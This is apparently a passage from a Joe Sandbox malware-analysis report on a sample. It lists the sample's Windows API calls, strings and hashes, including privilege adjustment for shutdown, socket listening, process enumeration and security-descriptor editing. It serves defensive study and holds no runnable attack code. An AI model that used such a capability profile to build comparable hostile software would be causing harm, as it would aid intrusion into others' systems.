                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                          • API String ID: 3393021363-188983378
                          • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                          • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                          • FindClose.KERNEL32(00000000), ref: 00431B20
                          • FindClose.KERNEL32(00000000), ref: 00431B34
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1409584000-438819550
                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                          • __swprintf.LIBCMT ref: 00431C2E
                          • _wcslen.LIBCMT ref: 00431C3A
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                          • String ID: :$\$\??\%s
                          • API String ID: 2192556992-3457252023
                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                          • __swprintf.LIBCMT ref: 004722B9
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: FolderPath$LocalTime__swprintf
                          • String ID: %.3d
                          • API String ID: 3337348382-986655627
                          • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                          • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                          • FindClose.KERNEL32(00000000), ref: 0044291C
                          • FindClose.KERNEL32(00000000), ref: 00442930
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                          • FindClose.KERNEL32(00000000), ref: 004429D4
                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                          • FindClose.KERNEL32(00000000), ref: 004429E2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 2640511053-438819550
                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                          APIs
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                          • GetLastError.KERNEL32 ref: 00433414
                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                          • String ID: SeShutdownPrivilege
                          • API String ID: 2938487562-3733053543
                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                          APIs
                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                          • CopySid.ADVAPI32(00000000), ref: 00446271
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 1255039815-0
                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                          APIs
                          • __swprintf.LIBCMT ref: 00433073
                          • __swprintf.LIBCMT ref: 00433085
                          • __wcsicoll.LIBCMT ref: 00433092
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                          • LockResource.KERNEL32(00000000), ref: 004330CA
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                          • LockResource.KERNEL32(?), ref: 00433120
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                          • String ID:
                          • API String ID: 1158019794-0
                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                          • GetLastError.KERNEL32 ref: 0045D6BF
                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove$_strncmp
                          • String ID: @oH$\$^$h
                          • API String ID: 2175499884-3701065813
                          • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                          • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                          • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                          • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                          • closesocket.WSOCK32(00000000), ref: 00465377
                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                          • closesocket.WSOCK32(00000000), ref: 004653BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLast$closesocket$bindlistensocket
                          • String ID:
                          • API String ID: 540024437-0
                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                          • API String ID: 0-2872873767
                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                          • __wsplitpath.LIBCMT ref: 00475644
                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                          • _wcscat.LIBCMT ref: 00475657
                          • __wcsicoll.LIBCMT ref: 0047567B
                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 2547909840-0
                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                          • FindClose.KERNEL32(?), ref: 004525FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
